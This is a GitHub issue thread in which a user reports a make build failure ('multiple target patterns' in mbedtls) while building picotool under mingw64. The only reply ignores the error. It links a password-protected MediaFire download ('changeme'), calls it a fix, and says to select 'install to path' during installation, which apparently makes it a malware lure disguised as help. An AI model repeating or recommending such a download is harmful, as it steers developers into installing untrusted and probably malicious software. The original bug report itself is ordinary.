### ISSUE TITLE
🪲[BUG] when make it give below error

### ISSUE THREAD

**Issue by kbladewht** [sekigon-gonnoc/Pico-PIO-USB#136]
[ 91%] Built target bintool
[ 93%] Built target elf2uf2
[100%] Built target picotool
[  2%] Performing install step for 'picotoolBuild'
lib/mbedtls/library/CMakeFiles/mbedcrypto.dir/compiler_depend.make:4: *** multiple target patterns.  Stop.
make[4]: *** [CMakeFiles/Makefile2:599: lib/mbedtls/library/CMakeFiles/mbedcrypto.dir/all] Error 2
make[3]: *** [Makefile:136: all] Error 2
make[2]: *** [pico-sdk/src/rp2040/boot_stage2/CMakeFiles/picotoolBuild.dir/build.make:103: pico-sdk/src/rp2040/boot_stage2/picotool/src/picotoolBuild-stamp/picotoolBuild-install] Error 2
make[1]: *** [CMakeFiles/Makefile2:1888: pico-sdk/src/rp2040/boot_stage2/CMakeFiles/picotoolBuild.dir/all] Error 2
make: *** [Makefile:91: all] Error 2

can anybody can help adjust?
basically I used mingw64

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
